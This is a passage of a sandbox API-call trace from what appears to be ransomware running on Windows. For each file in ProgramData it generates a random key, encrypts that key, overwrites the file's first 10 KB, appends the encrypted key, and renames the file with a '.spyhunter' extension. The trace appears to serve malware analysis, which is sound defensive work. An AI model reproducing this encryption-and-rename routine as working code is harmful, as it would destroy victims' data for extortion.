hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3eb8 | out: hHeap=0x2c0000) returned 1 [0129.324] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6f8 | out: pbBuffer=0x57f6f8) returned 1 [0129.324] GetProcessHeap () returned 0x2c0000 [0129.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0129.324] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6f0*=0x30) returned 1 [0129.324] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0129.325] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll") returned 71 [0129.325] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0129.325] GetProcessHeap () returned 0x2c0000 [0129.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.325] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f6b4*=0x2800, lpOverlapped=0x0) returned 1 [0129.349] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.349] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f6b4*=0x2800, lpOverlapped=0x0) returned 1 [0129.349] GetProcessHeap () returned 0x2c0000 [0129.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.349] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.349] WriteFile (in: hFile=0x120, lpBuffer=0x57f6f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f6b4, lpOverlapped=0x0 | out: lpBuffer=0x57f6f4*, lpNumberOfBytesWritten=0x57f6b4*=0x4, lpOverlapped=0x0) returned 1 [0129.353] WriteFile (in: hFile=0x120, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f6b4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f6b4*=0x30, lpOverlapped=0x0) returned 1 [0129.353] CloseHandle (hObject=0x120) returned 1 [0129.353] GetProcessHeap () returned 0x2c0000 [0129.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0129.353] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.spyhunter") returned 81 [0129.353] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll.spyhunter")) returned 1 [0129.355] GetProcessHeap () returned 0x2c0000 [0129.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0129.355] GetProcessHeap () returned 0x2c0000 [0129.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0129.355] GetProcessHeap () returned 0x2c0000 [0129.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7fda0 | out: hHeap=0x2c0000) returned 1 [0129.356] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6f0 | out: pbBuffer=0x57f6f0) returned 1 [0129.360] GetProcessHeap () returned 0x2c0000 [0129.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0129.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6e8*=0x30) returned 1 [0129.360] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0129.360] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll") returned 72 [0129.360] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0129.360] GetProcessHeap () returned 0x2c0000 [0129.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.360] ReadFile (in: hFile=0x120, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f6ac*=0x2800, lpOverlapped=0x0) returned 1 [0129.405] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.405] WriteFile (in: hFile=0x120, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f6ac*=0x2800, lpOverlapped=0x0) returned 1 [0129.405] GetProcessHeap () returned 0x2c0000 [0129.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.405] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.405] WriteFile (in: hFile=0x120, lpBuffer=0x57f6ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f6ac, lpOverlapped=0x0 | out: lpBuffer=0x57f6ec*, lpNumberOfBytesWritten=0x57f6ac*=0x4, lpOverlapped=0x0) returned 1 [0129.527] WriteFile (in: hFile=0x120, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f6ac, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f6ac*=0x30, lpOverlapped=0x0) returned 1 [0129.527] CloseHandle (hObject=0x120) returned 1 [0129.527] GetProcessHeap () returned 0x2c0000 [0129.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0129.527] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.spyhunter") returned 82 [0129.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll.spyhunter")) returned 1 [0129.528] GetProcessHeap () returned 0x2c0000 [0129.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0129.528] GetProcessHeap () returned 0x2c0000 [0129.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0129.528] GetProcessHeap () returned 0x2c0000 [0129.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4778 | out: hHeap=0x2c0000) returned 1 [0129.531] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6e0 | out: pbBuffer=0x57f6e0) returned 1 [0129.531] GetProcessHeap () returned 0x2c0000 [0129.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0129.531] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6d8*=0x30) returned 1 [0129.531] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0129.531] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned 59 [0129.531] StrStrW (lpFirst="user.bmp", lpSrch=".txt") returned 0x0 [0129.532] GetProcessHeap () returned 0x2c0000 [0129.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.532] ReadFile (in: hFile=0x120, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f69c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f69c*=0x2800, lpOverlapped=0x0) returned 1 [0129.532] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.532] WriteFile (in: hFile=0x120, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f69c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f69c*=0x2800, lpOverlapped=0x0) returned 1 [0129.533] GetProcessHeap () returned 0x2c0000 [0129.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.533] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.533] WriteFile (in: hFile=0x120, lpBuffer=0x57f6dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f69c, lpOverlapped=0x0 | out: lpBuffer=0x57f6dc*, lpNumberOfBytesWritten=0x57f69c*=0x4, lpOverlapped=0x0) returned 1 [0129.533] WriteFile (in: hFile=0x120, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f69c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f69c*=0x30, lpOverlapped=0x0) returned 1 [0129.533] CloseHandle (hObject=0x120) returned 1 [0129.533] GetProcessHeap () returned 0x2c0000 [0129.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0129.533] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.spyhunter") returned 69 [0129.533] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.spyhunter" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp.spyhunter")) returned 1 [0129.534] GetProcessHeap () returned 0x2c0000 [0129.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0129.534] GetProcessHeap () returned 0x2c0000 [0129.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0129.534] GetProcessHeap () returned 0x2c0000 [0129.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c738 | out: hHeap=0x2c0000) returned 1 [0129.534] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6e0 | out: pbBuffer=0x57f6e0) returned 1 [0129.534] GetProcessHeap () returned 0x2c0000 [0129.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0129.534] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6d8*=0x30) returned 1 [0129.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0129.535] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned 60 [0129.535] StrStrW (lpFirst="guest.bmp", lpSrch=".txt") returned 0x0 [0129.535] GetProcessHeap () returned 0x2c0000 [0129.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.535] ReadFile (in: hFile=0x120, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f69c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f69c*=0x2800, lpOverlapped=0x0) returned 1 [0129.547] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.547] WriteFile (in: hFile=0x120, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f69c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f69c*=0x2800, lpOverlapped=0x0) returned 1 [0129.547] GetProcessHeap () returned 0x2c0000 [0129.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.547] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.547] WriteFile (in: hFile=0x120, lpBuffer=0x57f6dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f69c, lpOverlapped=0x0 | out: lpBuffer=0x57f6dc*, lpNumberOfBytesWritten=0x57f69c*=0x4, lpOverlapped=0x0) returned 1 [0129.690] WriteFile (in: hFile=0x120, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f69c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f69c*=0x30, lpOverlapped=0x0) returned 1 [0129.690] CloseHandle (hObject=0x120) returned 1 [0129.690] GetProcessHeap () returned 0x2c0000 [0129.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0129.690] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.spyhunter") returned 70 [0129.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.spyhunter" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp.spyhunter")) returned 1 [0129.691] GetProcessHeap () returned 0x2c0000 [0129.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0129.691] GetProcessHeap () returned 0x2c0000 [0129.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0129.691] GetProcessHeap () returned 0x2c0000 [0129.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84e48 | out: hHeap=0x2c0000) returned 1 [0129.691] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6d8 | out: pbBuffer=0x57f6d8) returned 1 [0129.691] GetProcessHeap () returned 0x2c0000 [0129.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0129.691] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6d0*=0x30) returned 1 [0129.691] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.699] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm") returned 116 [0129.699] StrStrW (lpFirst="mpasbase.vdm", lpSrch=".txt") returned 0x0 [0129.699] GetProcessHeap () returned 0x2c0000 [0129.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.699] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f694, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f694*=0x2800, lpOverlapped=0x0) returned 1 [0129.700] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.700] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f694, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f694*=0x2800, lpOverlapped=0x0) returned 1 [0129.700] GetProcessHeap () returned 0x2c0000 [0129.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.701] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.701] WriteFile (in: hFile=0x17c, lpBuffer=0x57f6d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f694, lpOverlapped=0x0 | out: lpBuffer=0x57f6d4*, lpNumberOfBytesWritten=0x57f694*=0x4, lpOverlapped=0x0) returned 1 [0129.702] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f694, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f694*=0x30, lpOverlapped=0x0) returned 1 [0129.702] CloseHandle (hObject=0x17c) returned 1 [0129.702] GetProcessHeap () returned 0x2c0000 [0129.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0129.702] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.spyhunter") returned 126 [0129.702] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.spyhunter" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm.spyhunter")) returned 1 [0129.703] GetProcessHeap () returned 0x2c0000 [0129.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0129.703] GetProcessHeap () returned 0x2c0000 [0129.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0129.703] GetProcessHeap () returned 0x2c0000 [0129.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f476e8 | out: hHeap=0x2c0000) returned 1 [0129.703] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6d8 | out: pbBuffer=0x57f6d8) returned 1 [0129.703] GetProcessHeap () returned 0x2c0000 [0129.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0129.704] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6d0*=0x30) returned 1 [0129.704] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.758] GetProcessHeap () returned 0x2c0000 [0129.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0129.758] GetProcessHeap () returned 0x2c0000 [0129.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8cdd8 | out: hHeap=0x2c0000) returned 1 [0129.758] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6d0 | out: pbBuffer=0x57f6d0) returned 1 [0129.758] GetProcessHeap () returned 0x2c0000 [0129.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0129.758] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6c8*=0x30) returned 1 [0129.758] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0129.925] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl") returned 44 [0129.925] StrStrW (lpFirst="nslist.hxl", lpSrch=".txt") returned 0x0 [0129.925] GetProcessHeap () returned 0x2c0000 [0129.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.925] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f68c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f68c*=0x21dc, lpOverlapped=0x0) returned 1 [0130.035] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffde24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.036] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x21dc, lpNumberOfBytesWritten=0x57f68c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f68c*=0x21dc, lpOverlapped=0x0) returned 1 [0130.036] GetProcessHeap () returned 0x2c0000 [0130.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0130.036] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.036] WriteFile (in: hFile=0x170, lpBuffer=0x57f6cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f68c, lpOverlapped=0x0 | out: lpBuffer=0x57f6cc*, lpNumberOfBytesWritten=0x57f68c*=0x4, lpOverlapped=0x0) returned 1 [0130.036] WriteFile (in: hFile=0x170, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f68c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f68c*=0x30, lpOverlapped=0x0) returned 1 [0130.036] CloseHandle (hObject=0x170) returned 1 [0130.036] GetProcessHeap () returned 0x2c0000 [0130.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0130.036] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl.spyhunter") returned 54 [0130.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl.spyhunter" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl.spyhunter")) returned 1 [0130.037] GetProcessHeap () returned 0x2c0000 [0130.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0130.037] GetProcessHeap () returned 0x2c0000 [0130.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0130.037] GetProcessHeap () returned 0x2c0000 [0130.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33df18 | out: hHeap=0x2c0000) returned 1 [0130.041] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6c0 | out: pbBuffer=0x57f6c0) returned 1 [0130.041] GetProcessHeap () returned 0x2c0000 [0130.041] RtlAllocateHeap 